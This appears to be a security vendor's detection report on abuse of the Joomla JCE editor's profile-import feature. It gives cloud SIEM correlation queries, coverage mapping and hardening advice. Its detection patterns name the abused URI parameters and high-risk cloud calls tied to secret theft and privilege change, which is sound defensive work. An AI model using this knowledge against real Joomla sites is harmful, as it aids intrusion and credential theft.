Trigger when an AWS-hosted Joomla asset receives suspicious JCE profile-import activity and the same Joomla host private IP, EC2 instance, ECS task, EKS pod, target group, instance profile, task role, or Joomla-linked workload identity performs rare egress or high-risk AWS activity within 120 minutes.

Assign medium severity for rare egress from AWS-hosted Joomla workloads.

Assign high severity when rare egress or high-risk AWS activity aligns with suspicious JCE profile-import activity on a mapped Joomla asset.

Promote to critical when the Joomla-linked identity accesses Secrets Manager, Parameter Store, S3 backups, mail infrastructure, ECR images, CloudFormation, IAM, production storage, or other sensitive services outside approved maintenance and with linkage to the affected Joomla host.

Required Telemetry

AWS asset inventory.

EC2 tags.

ECS or EKS workload labels where applicable.

ALB access logs.

CloudFront logs where applicable.

AWS WAF logs.

VPC Flow Logs.

Route 53 Resolver query logs.

CloudTrail.

EDR telemetry from Joomla hosts.

Web server logs or reverse-proxy logs.

Approved Joomla IAM role lookup.

Approved Joomla instance profile lookup.

Approved maintenance-window lookup.

Approved egress-destination lookup.

Approved Joomla asset lookup.

Engineering Implementation Instructions

Map Joomla assets to EC2 instance IDs, private IPs, ECS tasks, EKS pods, target groups, ALB targets, CloudFront distributions, WAF web ACLs, IAM roles, instance profiles, task roles, security groups, NAT gateways, Route 53 Resolver sources, and hosted zones.

Validate that ALB, CloudFront, WAF, reverse-proxy, or web server logs preserve Joomla URI paths and query strings before enabling high severity.

Create lookups for approved Joomla IAM roles, approved Joomla instance profiles, approved maintenance windows, approved deployment actions, approved egress destinations, approved production accounts, approved Joomla assets, and approved hosting-provider sources.

Do not attribute AWS-only anomalies to Joomla/JCE compromise without Joomla asset identity, workload identity, web request, file, endpoint, or time-window correlation.

Treat AWS asset tagging, log-source joins, CloudTrail identity mapping, URI-log validation, endpoint correlation, identity-to-host mapping, and maintenance-window tuning as required local deployment work.

DRI Assessment

Moderate to high with ALB/WAF URI logs, web logs, EDR telemetry, Route 53 logs, VPC Flow Logs, asset mapping, and CloudTrail identity mapping.

DRI

7.8 / 10

TCR Assessment

Moderate operational confidence for AWS-only egress. High confidence when Joomla web activity joins to PHP access, endpoint execution, sensitive AWS API use, or workload identity activity linked to the affected host.

Operational TCR

7.4 / 10

Full-Telemetry TCR

8.9 / 10

Limitations

VPC Flow Logs do not show URI paths or process context. CloudTrail does not show Joomla local request handling or PHP execution. Production use requires application-layer and host telemetry; AWS control-plane, flow, DNS, or identity activity should not be treated as proof of Joomla/JCE compromise without web, host, workload, identity, file, or time-window correlation. Critical severity requires Joomla-linked identity or host-to-identity mapping, not time proximity alone.

Detection Query Pattern

AWS Athena / SQL-style correlation pattern requiring local table names, workload identity mapping, maintenance-window enrichment, and field validation:

WITH joomla_assets AS (
SELECT
joomla_site_id,
instance_id,
private_ip,
account_id
FROM ENV_AWS_JOOMLA_JCE_ASSETS
),

joomla_workload_identities AS (
SELECT
joomla_site_id,
account_id,
identity_arn,
identity_type,
assumed_role_pattern,
service_context
FROM ENV_AWS_JOOMLA_WORKLOAD_IDENTITY_MAP
),

suspicious_jce_uri AS (
SELECT
from_unixtime(alb.time) AS event_time,
alb.target_ip,
alb.target_status_code,
alb.client_ip,
alb.request_verb,
alb.request_url,
alb.user_agent,
ja.joomla_site_id,
ja.instance_id,
ja.account_id,
'jce_profile_import' AS signal
FROM ENV_AWS_ALB_ACCESS_LOGS alb
JOIN joomla_assets ja
ON alb.target_ip = ja.private_ip
LEFT JOIN ENV_APPROVED_JOOMLA_ADMIN_SOURCES admin_src
ON alb.client_ip = admin_src.source_ip
LEFT JOIN ENV_APPROVED_JOOMLA_SCANNERS scanner_src
ON alb.client_ip = scanner_src.source_ip
LEFT JOIN ENV_APPROVED_HOSTING_PROVIDER_SOURCES hosting_src
ON alb.client_ip = hosting_src.source_ip
WHERE alb.request_verb = 'POST'
AND alb.request_url LIKE '%option=com_jce%'
AND alb.request_url LIKE '%task=profiles.import%'
AND admin_src.source_ip IS NULL
AND scanner_src.source_ip IS NULL
AND hosting_src.source_ip IS NULL
),

rare_egress AS (
SELECT
from_unixtime(v.start) AS event_time,
v.srcaddr,
v.dstaddr,
v.dstport,
v.action,
ja.joomla_site_id,
ja.instance_id,
ja.account_id,
'rare_joomla_egress' AS signal
FROM ENV_AWS_VPC_FLOW_LOGS v
JOIN joomla_assets ja
ON v.srcaddr = ja.private_ip
LEFT JOIN ENV_APPROVED_JOOMLA_EGRESS_DESTINATIONS approved_egress
ON v.dstaddr = approved_egress.ip
WHERE v.action = 'ACCEPT'
AND approved_egress.ip IS NULL
AND v.dstaddr IS NOT NULL
AND v.dstaddr <> ''
),

cloudtrail_identity_candidates AS (
SELECT
c.eventtime AS event_time,
c.useridentity.arn AS principal_arn,
c.useridentity.principalid AS principal_id,
c.useridentity.type AS principal_type,
c.recipientaccountid AS account_id,
c.eventname,
c.eventsource,
c.awsregion,
c.sourceipaddress,
c.useragent,
c.requestparameters,
c.resources,
c.readonly
FROM ENV_AWS_CLOUDTRAIL c
WHERE c.eventname IN (
'GetSecretValue',
'GetParameter',
'GetParameters',
'PutParameter',
'GetObject',
'PutObject',
'DeleteObject',
'SendRawEmail',
'SendEmail',
'CreateAccessKey',
'AttachRolePolicy',
'PutRolePolicy',
'AssumeRole',
'UpdateFunctionCode',
'UpdateStack',
'CreateStack',
'DeleteStack'
)
),

high_risk_cloudtrail AS (
SELECT
c.event_time,
c.principal_arn,
c.principal_id,
c.principal_type,
c.eventname,
c.eventsource,
c.awsregion,
c.sourceipaddress,
c.useragent,
wi.joomla_site_id,
wi.account_id,
wi.identity_type,
wi.service_context,
'joomla_linked_aws_activity' AS signal
FROM cloudtrail_identity_candidates c
JOIN joomla_workload_identities wi
ON c.account_id = wi.account_id
AND (
c.principal_arn = wi.identity_arn
OR c.principal_arn LIKE wi.assumed_role_pattern
OR c.principal_id LIKE wi.assumed_role_pattern
)
LEFT JOIN ENV_APPROVED_AWS_JOOMLA_MAINTENANCE_WINDOWS mw
ON wi.joomla_site_id = mw.joomla_site_id
AND c.event_time BETWEEN mw.window_start AND mw.window_end
WHERE mw.joomla_site_id IS NULL
),

correlated_activity AS (
SELECT
s.event_time AS uri_time,
s.joomla_site_id,
s.instance_id,
s.account_id,
s.client_ip,
s.request_url,
s.user_agent,
e.event_time AS egress_time,
e.dstaddr,
e.dstport,
c.event_time AS cloudtrail_time,
c.principal_arn,
c.principal_type,
c.identity_type,
c.service_context,
c.eventname,
c.eventsource,
c.awsregion,
c.sourceipaddress,
c.signal AS cloudtrail_signal,
e.signal AS egress_signal
FROM suspicious_jce_uri s
LEFT JOIN rare_egress e
ON s.joomla_site_id = e.joomla_site_id
AND e.event_time BETWEEN s.event_time AND s.event_time + INTERVAL '120' MINUTE
LEFT JOIN high_risk_cloudtrail c
ON s.joomla_site_id = c.joomla_site_id
AND c.event_time BETWEEN s.event_time AND s.event_time + INTERVAL '120' MINUTE
)

SELECT
uri_time,
joomla_site_id,
instance_id,
account_id,
client_ip,
request_url,
user_agent,
egress_time,
dstaddr,
dstport,
cloudtrail_time,
principal_arn,
principal_type,
identity_type,
service_context,
eventname,
eventsource,
awsregion,
sourceipaddress,
CASE
WHEN cloudtrail_signal IS NOT NULL AND egress_signal IS NOT NULL THEN 'high'
WHEN cloudtrail_signal IS NOT NULL THEN 'high'
WHEN egress_signal IS NOT NULL THEN 'medium'
ELSE 'informational'
END AS severity,
'Joomla JCE Profile Import Followed by AWS Workload or Network Activity' AS cyberdax_rule
FROM correlated_activity
WHERE egress_signal IS NOT NULL
OR cloudtrail_signal IS NOT NULL

Azure

Detection Viability Assessment

Production-deployable only when Joomla is hosted on Azure and Azure telemetry can be joined with application-layer logs, WAF or Application Gateway logs, endpoint telemetry, identity logs, and workload mapping. Azure Activity Logs alone are not sufficient.

Rule

Azure Hosted Joomla JCE Profile Import With Linked Egress Key Vault or Hosting Activity

Rule Format

Azure Monitor / Log Analytics KQL correlation pattern requiring Joomla asset and identity mapping.

Detection Purpose

Detect Azure-hosted Joomla JCE profile-import activity that aligns with rare egress or Joomla-linked identity activity involving Key Vault, storage, App Service, container registry, infrastructure modification, mail abuse, or production-impacting resources.

Detection Logic

Trigger when an Azure-hosted Joomla asset shows suspicious JCE profile-import activity and the same VM, workload, private IP, managed identity, service principal, or Joomla-linked identity shows rare egress or high-risk Azure activity within 120 minutes.

Assign medium severity for rare egress from Azure-hosted Joomla assets.

Assign high severity when rare egress or high-risk Azure activity aligns with suspicious JCE profile-import activity on a mapped Joomla asset.

Promote to critical when Joomla-linked identities access Key Vault secrets, alter production resources, modify web app settings, access storage backups, push container images, assign roles, or interact with mail or hosting services outside approved maintenance.

Required Telemetry

Application Gateway access logs.

Azure WAF logs.

Reverse-proxy logs where applicable.

Web server logs.

Defender for Endpoint telemetry from Joomla hosts.

NSG Flow Logs.

Azure DNS or proxy logs.

Azure Activity Logs.

Microsoft Entra ID logs.

Key Vault audit logs.

Storage audit logs where applicable.

Container Registry logs where applicable.

Approved Joomla service principal lookup.

Approved Joomla managed identity lookup.

Approved maintenance-window lookup.

Approved egress-destination lookup.

Approved Joomla asset lookup.

Engineering Implementation Instructions

Map Joomla assets to Azure VMs, VMSS instances, App Service instances, AKS workloads, private IPs, Application Gateway backend pools, WAF policies, managed identities, service principals, Key Vault access policies, storage accounts, container registries, and deployment targets.

Validate URI visibility in Application Gateway, WAF, reverse-proxy, or web server logs before enabling high severity.

Create approved Joomla identity, maintenance-window, egress-destination, resource-group, subscription, Key Vault, storage, container registry, and asset lookup tables.

Do not deploy an Azure Activity Log-only version of this rule.

Treat Azure asset mapping, identity mapping, WAF/Application Gateway field validation, endpoint telemetry joins, maintenance-window tuning, identity-to-host mapping, and SOC routing as required local deployment work.

DRI Assessment

Moderate with Azure-hosted Joomla asset mapping and application-layer telemetry. Low for Azure-native control-plane-only telemetry.

DRI

7.6 / 10

TCR Assessment

Moderate operational confidence when Azure logs show suspicious downstream activity. High confidence requires Joomla web, endpoint, and identity correlation linked to the affected host or Joomla identity.

Operational TCR

7.3 / 10

Full-Telemetry TCR

8.8 / 10

Limitations

Azure Activity Logs do not show Joomla request handling, JCE profile import behavior, or local PHP execution. Application-layer and endpoint telemetry are required for production confidence; Azure control-plane, identity, network, or resource activity should not be treated as proof of Joomla/JCE compromise without web, host, workload, identity, file, or time-window correlation. Critical severity requires Joomla-linked identity or host-to-identity correlation, not time proximity alone.

Detection Query Pattern

Azure Monitor / Log Analytics KQL pattern requiring local table, lookup, workload identity, maintenance-window, and field validation:

let JoomlaAssets =
externaldata(
JoomlaSiteId:string,
PrivateIp:string,
Hostname:string,
BackendPool:string,
SubscriptionId:string,
ResourceGroup:string
)
["ENV_AZURE_JOOMLA_JCE_ASSETS_LOOKUP"];

let JoomlaWorkloadIdentities =
externaldata(
JoomlaSiteId:string,
SubscriptionId:string,
Identity:string,
IdentityType:string,
ServiceContext:string
)
["ENV_AZURE_JOOMLA_WORKLOAD_IDENTITY_MAP"];

let ApprovedAdminSources =
externaldata(SourceIp:string)
["ENV_APPROVED_JOOMLA_ADMIN_SOURCES_LOOKUP"];

let ApprovedScanners =
externaldata(SourceIp:string)
["ENV_APPROVED_JOOMLA_SCANNERS_LOOKUP"];

let ApprovedHostingProviderSources =
externaldata(SourceIp:string)
["ENV_APPROVED_HOSTING_PROVIDER_SOURCES_LOOKUP"];

let ApprovedEgress =
externaldata(DestinationIp:string, DestinationDomain:string)
["ENV_APPROVED_JOOMLA_EGRESS_DESTINATIONS_LOOKUP"];

let ApprovedMaintenanceWindows =
externaldata(
JoomlaSiteId:string,
MaintenanceStart:datetime,
MaintenanceEnd:datetime
)
["ENV_APPROVED_AZURE_JOOMLA_MAINTENANCE_WINDOWS_LOOKUP"];

let SuspiciousJceUri =
AzureDiagnostics
| where Category in ("ApplicationGatewayAccessLog","ApplicationGatewayFirewallLog")
| where requestMethod_s == "POST"
| where requestUri_s has "option=com_jce"
| where requestUri_s has "task=profiles.import"
| project
UriTime=TimeGenerated,
BackendPool=tostring(backendPoolName_s),
SourceIp=tostring(clientIP_s),
Uri=tostring(requestUri_s),
Method=tostring(requestMethod_s),
UserAgent=tostring(userAgent_s)
| join kind=inner JoomlaAssets on BackendPool
| join kind=leftouter ApprovedAdminSources on $left.SourceIp == $right.SourceIp
| extend ApprovedAdminSource=SourceIp1
| project-away SourceIp1
| join kind=leftouter ApprovedScanners on $left.SourceIp == $right.SourceIp
| extend ApprovedScannerSource=SourceIp1
| project-away SourceIp1
| join kind=leftouter ApprovedHostingProviderSources on $left.SourceIp == $right.SourceIp
| extend ApprovedHostingProviderSource=SourceIp1
| project-away SourceIp1
| where isempty(ApprovedAdminSource)
and isempty(ApprovedScannerSource)
and isempty(ApprovedHostingProviderSource)
| project
UriTime,
JoomlaSiteId,
Hostname,
PrivateIp,
BackendPool,
SubscriptionId,
ResourceGroup,
SourceIp,
Uri,
Method,
UserAgent;

let RareEgress =
AzureNetworkAnalytics_CL
| project
EgressTime=TimeGenerated,
PrivateIp=tostring(SrcIP_s),
DestIP=tostring(DestIP_s),
DestDomain=tostring(DestDomain_s),
DestPort=tostring(DestPort_d),
FlowStatus=tostring(FlowStatus_s)
| join kind=inner JoomlaAssets on PrivateIp
| where FlowStatus == "Allowed"
| where isnotempty(DestIP)
| join kind=leftouter ApprovedEgress on $left.DestIP == $right.DestinationIp
| extend ApprovedEgressIp=DestinationIp
| project-away DestinationIp
| join kind=leftouter ApprovedEgress on $left.DestDomain == $right.DestinationDomain
| extend ApprovedEgressDomain=DestinationDomain
| project-away DestinationDomain
| where isempty(ApprovedEgressIp)
and isempty(ApprovedEgressDomain)
| project
EgressTime,
JoomlaSiteId,
Hostname,
PrivateIp,
SubscriptionId,
DestIP,
DestDomain,
DestPort;

let HighRiskAzureActivity =
AzureActivity
| where OperationNameValue in (
"MICROSOFT.KEYVAULT/VAULTS/SECRETS/READ",
"MICROSOFT.KEYVAULT/VAULTS/SECRETS/WRITE",
"MICROSOFT.STORAGE/STORAGEACCOUNTS/BLOBS/READ",
"MICROSOFT.STORAGE/STORAGEACCOUNTS/BLOBS/WRITE",
"MICROSOFT.WEB/SITES/CONFIG/WRITE",
"MICROSOFT.WEB/SITES/WRITE",
"MICROSOFT.CONTAINERREGISTRY/REGISTRIES/PUSH/WRITE",
"MICROSOFT.RESOURCES/DEPLOYMENTS/WRITE",
"MICROSOFT.AUTHORIZATION/ROLEASSIGNMENTS/WRITE"
)
| project
CloudTime=TimeGenerated,
Identity=tostring(Caller),
OperationNameValue=tostring(OperationNameValue),
ActivityStatusValue=tostring(ActivityStatusValue),
ResourceGroup=tostring(ResourceGroup),
SubscriptionId=tostring(SubscriptionId),
ResourceId=tostring(_ResourceId),
CallerIpAddress=tostring(CallerIpAddress)
| join kind=inner JoomlaWorkloadIdentities on Identity
| join kind=leftouter ApprovedMaintenanceWindows on JoomlaSiteId
| where isempty(MaintenanceStart)
or not(CloudTime between (MaintenanceStart .. MaintenanceEnd))
| project
CloudTime,
JoomlaSiteId,
SubscriptionId,
Identity,
IdentityType,
ServiceContext,
OperationNameValue,
ActivityStatusValue,
ResourceGroup,
ResourceId,
CallerIpAddress;

let UriWithRareEgress =
SuspiciousJceUri
| join kind=inner RareEgress on JoomlaSiteId
| where EgressTime between (UriTime .. UriTime + 120m)
| project
UriTime,
JoomlaSiteId,
Hostname,
PrivateIp,
BackendPool,
SubscriptionId,
ResourceGroup,
SourceIp,
Uri,
UserAgent,
EgressTime,
DestIP,
DestDomain,
DestPort,
CloudTime=datetime(null),
Identity="",
IdentityType="",
ServiceContext="",
OperationNameValue="",
ActivityStatusValue="",
ResourceId="",
CallerIpAddress="",
Signal="rare_joomla_egress";

let UriWithHighRiskCloudActivity =
SuspiciousJceUri
| join kind=inner HighRiskAzureActivity on JoomlaSiteId
| where CloudTime between (UriTime .. UriTime + 120m)
| project
UriTime,
JoomlaSiteId,
Hostname,
PrivateIp,
BackendPool,
SubscriptionId,
ResourceGroup,
SourceIp,
Uri,
UserAgent,
EgressTime=datetime(null),
DestIP="",
DestDomain="",
DestPort="",
CloudTime,
Identity,
IdentityType,
ServiceContext,
OperationNameValue,
ActivityStatusValue,
ResourceId,
CallerIpAddress,
Signal="joomla_linked_azure_activity";

union UriWithRareEgress, UriWithHighRiskCloudActivity
| summarize
Signals=make_set(Signal),
DestIPs=make_set(DestIP),
DestDomains=make_set(DestDomain),
DestPorts=make_set(DestPort),
Identities=make_set(Identity),
IdentityTypes=make_set(IdentityType),
ServiceContexts=make_set(ServiceContext),
Operations=make_set(OperationNameValue),
ResourceIds=make_set(ResourceId),
FirstSeen=min(UriTime),
LastSeen=max(coalesce(EgressTime, CloudTime, UriTime))
by JoomlaSiteId, Hostname, PrivateIp, BackendPool, SubscriptionId, ResourceGroup, SourceIp, Uri, UserAgent
| extend Severity=case(
array_length(Signals) > 1, "high",
set_has_element(Signals, "joomla_linked_azure_activity"), "high",
set_has_element(Signals, "rare_joomla_egress"), "medium",
"informational"
)
| extend CyberDaxRule="Joomla JCE Profile Import Followed by Azure Workload or Network Activity"
| project
FirstSeen,
LastSeen,
JoomlaSiteId,
Hostname,
PrivateIp,
BackendPool,
SubscriptionId,
ResourceGroup,
SourceIp,
Uri,
UserAgent,
Severity,
Signals,
DestIPs,
DestDomains,
DestPorts,
Identities,
IdentityTypes,
ServiceContexts,
Operations,
ResourceIds,
CyberDaxRule

GCP

Detection Viability Assessment

Production-deployable only when Joomla is hosted on GCP and GCP telemetry can be joined with application-layer logs, endpoint telemetry, workload identity, and downstream cloud activity. GCP Audit Logs alone are not sufficient.

Rule

GCP Hosted Joomla JCE Profile Import With Linked Service Account Secret Artifact or Egress Activity

Rule Format

BigQuery / Cloud Logging correlation pattern requiring Joomla asset and identity mapping.

Detection Purpose

Detect GCP-hosted Joomla JCE profile-import activity that aligns with rare egress or Joomla-linked service-account activity involving Secret Manager, Artifact Registry, Cloud Storage, GKE, infrastructure modification, or production resources.

Detection Logic

Trigger when a GCP-hosted Joomla asset shows suspicious JCE profile-import activity and the same VM, GKE workload, private IP, service account, or Joomla-linked identity shows rare egress or high-risk GCP activity within 120 minutes.

Assign medium severity for rare egress from GCP-hosted Joomla assets.

Assign high severity when rare egress or high-risk GCP activity aligns with suspicious JCE profile-import activity on a mapped Joomla asset.

Promote to critical when Joomla-linked service accounts access secrets, alter storage backups, push artifacts, modify GKE workloads, modify production infrastructure, assign IAM policy, or alter production resources outside approved maintenance.

Required Telemetry

Cloud Load Balancing logs.

Cloud Armor logs where applicable.

Web server or reverse-proxy logs.

Compute Engine or GKE asset mapping.

Endpoint telemetry from Joomla workloads.

VPC Flow Logs.

Cloud DNS logs.

Google Cloud Audit Logs.

Secret Manager audit logs.

GKE audit logs where applicable.

Cloud Storage audit logs where applicable.

Artifact Registry logs where applicable.

Approved Joomla service-account lookup.

Approved maintenance-window lookup.

Approved egress-destination lookup.

Approved Joomla asset lookup.

Engineering Implementation Instructions

Map Joomla assets to Compute Engine instances, GKE pods, namespaces, service accounts, private IPs, load-balancer backends, Cloud Armor policies, Artifact Registry repositories, Cloud Storage buckets, Secret Manager secrets, deployment targets, and production projects.

Validate URI visibility through load balancer, ingress, reverse proxy, WAF, or web server logs before enabling high-severity detections.

Create approved Joomla service account, maintenance-window, egress-destination, project, cluster, namespace, secret, registry, storage, asset, and workload lookup tables.

Do not deploy a GCP Audit Log-only version of this rule.

Treat GCP asset mapping, workload identity mapping, URI-log validation, endpoint telemetry joins, maintenance-window tuning, identity-to-host mapping, and SOC routing as required local deployment work.

DRI Assessment

Moderate with GCP-hosted Joomla asset mapping and application-layer telemetry. Low for GCP-native control-plane-only telemetry.

DRI

7.5 / 10

TCR Assessment

Moderate operational confidence when GCP logs show suspicious downstream activity. High confidence requires Joomla web, endpoint, and identity correlation linked to the affected host or Joomla service account.

Operational TCR

7.2 / 10

Full-Telemetry TCR

8.7 / 10

Limitations

GCP Audit Logs do not show Joomla request handling, JCE profile import behavior, or local PHP execution. Application-layer and endpoint telemetry are required for production confidence; GCP audit, network, DNS, or service-account activity should not be treated as proof of Joomla/JCE compromise without web, host, workload, identity, file, or time-window correlation. Critical severity requires Joomla-linked service account or host-to-identity correlation, not time proximity alone.

Detection Query Pattern

BigQuery / Cloud Logging SQL-style pattern requiring local table names, workload identity mapping, maintenance-window enrichment, and field validation:

WITH joomla_assets AS (

SELECT

joomla_site_id,

backend_service_name,

private_ip,

instance_id,

project_id

FROM ENV_GCP_JOOMLA_JCE_ASSETS

),

joomla_workload_identities AS (

SELECT

joomla_site_id,

project_id,

principal_email,

identity_type,

service_context

FROM ENV_GCP_JOOMLA_WORKLOAD_IDENTITY_MAP

),

suspicious_jce_uri AS (

SELECT

lb.timestamp AS event_time,

lb.resource.labels.backend_service_name AS backend_service_name,

lb.httpRequest.remoteIp AS source_ip,

lb.httpRequest.requestMethod AS method,

lb.httpRequest.requestUrl AS request_url,

lb.httpRequest.userAgent AS user_agent,

ja.joomla_site_id,

ja.private_ip,

ja.instance_id,

ja.project_id,

'jce_profile_import' AS signal

FROM ENV_GCP_HTTP_LOAD_BALANCER_LOGS lb

JOIN joomla_assets ja

ON lb.resource.labels.backend_service_name = ja.backend_service_name

LEFT JOIN ENV_APPROVED_JOOMLA_ADMIN_SOURCES admin_src

ON lb.httpRequest.remoteIp = admin_src.source_ip

LEFT JOIN ENV_APPROVED_JOOMLA_SCANNERS scanner_src

ON lb.httpRequest.remoteIp = scanner_src.source_ip

LEFT JOIN ENV_APPROVED_HOSTING_PROVIDER_SOURCES hosting_src

ON lb.httpRequest.remoteIp = hosting_src.source_ip

WHERE lb.httpRequest.requestMethod = 'POST'

AND REGEXP_CONTAINS(lb.httpRequest.requestUrl, r'option=com_jce')

AND REGEXP_CONTAINS(lb.httpRequest.requestUrl, r'task=profiles\.import')

AND admin_src.source_ip IS NULL

AND scanner_src.source_ip IS NULL

AND hosting_src.source_ip IS NULL

),

rare_egress AS (

SELECT

flow.timestamp AS event_time,

flow.jsonPayload.connection.src_ip AS src_ip,

flow.jsonPayload.connection.dest_ip AS dest_ip,

flow.jsonPayload.connection.dest_port AS dest_port,

flow.jsonPayload.disposition AS disposition,

ja.joomla_site_id,

ja.project_id,

'rare_joomla_egress' AS signal

FROM ENV_GCP_VPC_FLOW_LOGS flow

JOIN joomla_assets ja

ON flow.jsonPayload.connection.src_ip = ja.private_ip

LEFT JOIN ENV_APPROVED_JOOMLA_EGRESS_DESTINATIONS approved_egress

ON flow.jsonPayload.connection.dest_ip = approved_egress.dest_ip

WHERE flow.jsonPayload.disposition = 'ALLOWED'

AND flow.jsonPayload.connection.dest_ip IS NOT NULL

AND flow.jsonPayload.connection.dest_ip <> ''

AND approved_egress.dest_ip IS NULL

),

audit_candidates AS (

SELECT

audit.timestamp AS event_time,

audit.protoPayload.authenticationInfo.principalEmail AS principal_email,

audit.protoPayload.methodName AS method_name,

audit.resource.labels.project_id AS project_id,

audit.protoPayload.resourceName AS resource_name,

audit.protoPayload.requestMetadata.callerIp AS caller_ip,

audit.protoPayload.serviceName AS service_name

FROM ENV_GCP_AUDIT_LOGS audit

WHERE audit.protoPayload.methodName IN (

'google.cloud.secretmanager.v1.SecretManagerService.AccessSecretVersion',

'storage.objects.get',

'storage.objects.create',

'storage.objects.delete',

'google.devtools.artifactregistry.v1.ArtifactRegistry.UploadAptArtifact',

'google.devtools.artifactregistry.v1.ArtifactRegistry.UploadYumArtifact',

'io.k8s.apps.v1.deployments.update',

'io.k8s.core.v1.secrets.get',

'v1.compute.instances.setMetadata',

'v1.compute.instances.insert',

'v1.compute.firewalls.patch',

'SetIamPolicy'

)

),

high_risk_gcp_activity AS (

SELECT

a.event_time,

a.principal_email,

a.method_name,

a.project_id,

a.resource_name,

a.caller_ip,

a.service_name,

wi.joomla_site_id,

wi.identity_type,

wi.service_context,

'joomla_linked_gcp_activity' AS signal

FROM audit_candidates a

JOIN joomla_workload_identities wi

ON a.project_id = wi.project_id

AND a.principal_email = wi.principal_email

LEFT JOIN ENV_APPROVED_GCP_JOOMLA_MAINTENANCE_WINDOWS mw

ON wi.joomla_site_id = mw.joomla_site_id

AND a.event_time BETWEEN mw.maintenance_start AND mw.maintenance_end

WHERE mw.joomla_site_id IS NULL

),

correlated_activity AS (

SELECT

s.event_time AS uri_time,

s.joomla_site_id,

s.private_ip,

s.instance_id,

s.project_id,

s.source_ip,

s.request_url,

s.user_agent,

e.event_time AS egress_time,

e.dest_ip,

e.dest_port,

c.event_time AS cloud_time,

c.principal_email,

c.identity_type,

c.service_context,

c.method_name,

c.resource_name,

c.caller_ip,

c.service_name,

e.signal AS egress_signal,

c.signal AS cloud_signal

FROM suspicious_jce_uri s

LEFT JOIN rare_egress e

ON s.joomla_site_id = e.joomla_site_id

AND e.event_time BETWEEN s.event_time AND TIMESTAMP_ADD(s.event_time, INTERVAL 120 MINUTE)

LEFT JOIN high_risk_gcp_activity c

ON s.joomla_site_id = c.joomla_site_id

AND c.event_time BETWEEN s.event_time AND TIMESTAMP_ADD(s.event_time, INTERVAL 120 MINUTE)

)

SELECT

uri_time,

joomla_site_id,

private_ip,

instance_id,

project_id,

source_ip,

request_url,

user_agent,

egress_time,

dest_ip,

dest_port,

cloud_time,

principal_email,

identity_type,

service_context,

method_name,

resource_name,

caller_ip,

service_name,

CASE

WHEN egress_signal IS NOT NULL AND cloud_signal IS NOT NULL THEN 'high'

WHEN cloud_signal IS NOT NULL THEN 'high'

WHEN egress_signal IS NOT NULL THEN 'medium'

ELSE 'informational'

END AS severity,

'Joomla JCE Profile Import Followed by GCP Workload or Network Activity' AS cyberdax_rule

FROM correlated_activity

WHERE egress_signal IS NOT NULL

OR cloud_signal IS NOT NULL

S26 Threat-to-Rule Traceability

JCE Profile Import Abuse

Covered by NDR / Network Behavioral Analytics, Splunk, Elastic, QRadar, AWS, Azure, and GCP where URI paths, query strings, and Joomla asset identity are available.

Rogue JCE Profile or Executable Upload Policy

Partially covered. Direct coverage requires Joomla administrative audit logs, database inspection, CMS state export, or file-system evidence. Without CMS telemetry, rules infer risk from profile-import request behavior, PHP access, and file/process evidence.

PHP Payload Upload and Web-Accessible Execution

Covered by NDR, Splunk, Elastic, QRadar, SentinelOne, SIGMA, YARA, and cloud-hosted correlation rules where writable-path PHP access, file creation, process execution, or artifact scanning is available.

Web Server Service-Context Execution

Covered by SentinelOne, Splunk, Elastic, QRadar, and SIGMA where process creation, parent process, command-line, and service-user telemetry are available.

Credential-File Access

Covered by SentinelOne, Splunk, Elastic, QRadar, and YARA where configuration.php, backup files, database dumps, environment files, or credential-bearing files are accessed or embedded in suspicious artifacts.

Rare Outbound Communication

Covered by NDR, DNS/proxy, Splunk, Elastic, QRadar, AWS, Azure, and GCP correlations where Joomla host identity and egress telemetry are available.

Hosted-Content Tampering and Abuse Infrastructure

Covered where webroot file telemetry, CMS content review, WAF logs, hosting-control logs, FTP logs, DNS/proxy logs, abuse reports, and file integrity monitoring can be tied to the affected Joomla site.

Post-Patch Compromise Validation

Covered through hunting logic, file review, web-log review, rogue profile inspection, credential rotation guidance, backup comparison, malware scanning, and hosting-control review.

Evidence and Visibility Gaps

Covered by telemetry requirements, detection gaps, non-coverage conditions, cloud telemetry limitations, and local implementation guidance.

S29 Detection Coverage Summary

Coverage is strongest where web logs, WAF logs, reverse-proxy logs, CMS profile state, file telemetry, endpoint process telemetry, DNS/proxy logs, FTP logs, hosting-control logs, and asset inventory can be joined by Joomla site, virtual host, backend host, source, file path, process, destination, and time window.

Minimum viable coverage requires visibility into JCE profile-import requests and web access to PHP-like files in writable Joomla paths.

Stronger coverage requires file telemetry, endpoint telemetry, CMS profile review, and egress telemetry.

Highest confidence requires correlation across JCE profile-import request activity, rogue JCE profile state, unexpected PHP artifacts, HTTP access to those artifacts, web server process behavior, sensitive file access, rare egress, and hosted-content changes.

Cloud-native logs alone are insufficient unless combined with Joomla application-layer logs, host telemetry, workload identity mapping, and URI-preserving web telemetry.

Customer-specific telemetry validation is expected and does not reduce production-readiness when Required Telemetry, Engineering Implementation Instructions, Limitations, and Notes / Next Suggested Steps provide the engineer or administrator with a clear implementation path.

S33 Defensive Control & Hardening Improvements

Update JCE to 2.9.99.6 or later.

Apply vendor-provided stopgap patch only where upgrade is not immediately possible.

Preserve web server access logs before rotation.

Review JCE editor profiles for unfamiliar, auto-generated, recently created, or abnormal entries.

Remove rogue profiles and files uploaded through them.

Disable PHP execution in tmp, images, media, uploads, cache, and other writable directories.

Search for PHP-like files in directories that should not execute server-side code.

Review Joomla configuration.php, database credentials, FTP credentials, mail settings, API keys, backup archives, and environment files for exposure risk.

Rotate Joomla administrator, database, FTP, hosting-control, SSH, mail, and reused credentials after suspected compromise.

Run server-side malware scanning and compare webroot state against known-good backups.

Review hosted content for defacement, injected redirects, phishing pages, malware hosting, spam scripts, and unexpected templates or plugins.

Review FTP, hosting-control, file-manager, backup, and deployment logs.

Add WAF filtering for suspicious com_jce profile import requests.

Validate file-integrity monitoring for Joomla webroots and writable directories.

Maintain a current asset inventory of Joomla sites and installed JCE versions.

Preserve logs from web servers, WAF, reverse proxy, load balancer, endpoint, DNS, proxy, FTP, hosting-control, database, and backup sources during investigation.

S39 Economic Impact & Organizational Exposure

Joomla JCE profile-import abuse creates organizational exposure by increasing uncertainty around website integrity, CMS profile trust, executable upload controls, server-side file integrity, credential confidentiality, hosted-content reliability, customer-facing communications, hosting-provider trust, and public brand reputation. Exposure rises when affected Joomla sites support customer portals, ecommerce, regulated content collection, authentication-adjacent workflows, public communications, customer documentation, marketing operations, or business-critical hosted applications.

Estimated Economic Exposure

